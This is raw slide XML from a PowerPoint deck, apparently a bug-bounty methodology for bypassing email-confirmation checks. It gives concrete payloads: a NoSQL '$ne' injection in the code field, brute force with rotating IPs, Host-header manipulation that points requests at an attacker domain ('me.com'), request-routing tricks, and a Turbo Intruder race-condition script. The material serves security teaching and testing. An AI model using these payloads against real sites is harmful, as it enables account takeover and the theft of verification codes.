              <a:t> Insert Value Of Code As Array e.g {"code":["$ne","WrongCODE"]}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass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532" name="Google Shape;532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/addEmail/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Verify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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Content-Type: application/json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{"email":"victim@gmail.com","csrf":"*******","code":{"$ne":"wrong"}]}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33" name="Google Shape;533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4" name="Google Shape;534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36" name="Google Shape;53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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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38" name="Google Shape;53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Brute Force The Confirmation Code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Using Multiple IPs Or Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP Rotate Burp Suite Extension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544" name="Google Shape;544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/addEmail/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Verify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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Host: 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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>code=FUZZ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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45" name="Google Shape;545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6" name="Google Shape;546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48" name="Google Shape;5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50" name="Google Shape;55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Override The Host Header e.g. POST https://company.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AND</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Change Host Header e.g Host: me.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://company.com/addEmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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b="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: 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100" y="2557894"/>
            <a:ext cx="462400" cy="491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Figure Out Reaction Of The Server While Doing Race Condition By Using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Turbo Intruder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1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Nuclei</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Send Simultaneously Requests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556" name="Google Shape;556;p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POST /addEmail/verify HTTP/1.1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Host: www.company.com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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>X-Test: %s</a:t>
            </a:r>
            <a:endParaRPr sz="12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email=victim@gmail.com&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="700" b="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>otp=wrongOTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="700" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;csrf=*******</a:t>
            </a:r>
            <a:endParaRPr sz="7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def queueRequests(target, wordlists):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engine = RequestEngine(endpoint=target.endpoint,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                       concurrentConnections=30,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                       requestsPerConnection=100,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                       pipeline=False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                       )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for i in range(30):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    engine.queue(target.req, target.baseInput, gate='race1')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engine.openGate('race1')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engine.complete(timeout=60)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def handleResponse(req, interesting):</a:t>
            </a:r>
            <a:endParaRPr sz="7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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    table.add(req)</a:t>
            </a:r>
            <a:endParaRPr sz="700" b="1">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="557" name="Google Shape;557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8" name="Google Shape;558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0" name="Google Shape;56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700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563" name="Google Shape;563;p6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564" name="Google Shape;564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0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75" rIns="0" bIns="0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9600" b="1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1" name="Google Shape;571;p70"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295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lang="en" b="1">
                <a:latin typeface="Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="3600" b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lang="en" sz="3600" b="1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lang="en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lang="en" b="1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72" name="Google Shape;57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0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70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70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Ambiguate The Host Header e.g. Host: company.com@me.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To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EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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236" name="Google Shape;236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b="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: company.com@me.com</a:t>
            </a:r>
            <a:endParaRPr b="1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sz="1200" b="1">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="237" name="Google Shape;237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Ambiguate The Host Header e.g. Host: company.com:@me.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To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EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Get The Confirmation Code</a:t>
            </a:r>
            <a:endParaRPr sz="1700" b="1">
              <a:solidFill>
                <a:srgbClr val="0B5394"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="248" name="Google Shape;248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Host: company.com:@me.com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9" name="Google Shape;249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Ambiguate The Host Header e.g. Host: company.com: me.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Get The Confirmation Code</a:t>
            </a:r>
            <a:endParaRPr sz="1700" b="1">
              <a:solidFill>
                <a:srgbClr val="0B5394"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="260" name="Google Shape;260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/addEmail HTTP/1.1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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: company.com: me.com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4" name="Google Shape;2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Change Routing Of The Request e.g. POST @me.com/addEmail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>POST :@me.com/addEmail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@me.com/addEmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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200" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: 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4" name="Google Shape;274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Change Routing Of The Request e.g. POST /addEmail@me.com# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>POST @me.com/addEmail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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284" name="Google Shape;284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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>addEmail@me.com#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> HTTP/1.1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200" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: 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6" name="Google Shape;286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290" name="Google Shape;2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9999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>
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Change Routing Of The Request e.g. POST /addEmail@me.com# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>POST /addEmail:@me.com# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>With</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> HTTP/1.0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get The Confirmation Code</a:t>
            </a:r>
            <a:endParaRPr sz="1700" b="1">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="296" name="Google Shape;296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POST /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>addEmail@me.com#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP/1.0</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: 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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: https://previous.com/path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Origin: https://www.company.com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Content-Length: Number</a:t>
            </a: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EFEFE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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>email=victim@gmail.com&amp;csrf=*******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8" name="Google Shape;298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0" name="Google Shape;30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lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mine</a:t>
            </a:r>
            <a:endParaRPr sz="1700" b="1">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr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2863</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>384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Lato</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Source Code Pro</vt:lpstr>
      <vt:lpstr>Oswald</vt:lpstr>
      <vt:lpstr>Arial Black</vt:lpstr>
      <vt:lpstr>Simple Light</vt:lpstr>
      <vt:lpstr>Modern Writer</vt:lpstr>
      <vt:lpstr> Mahmoud M. Awali          @0xAwali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Mahmoud M. Awali          @0xAwali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quang</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-17T04:57:04Z</dcterms:modified>
</cp:coreProperties>
</file>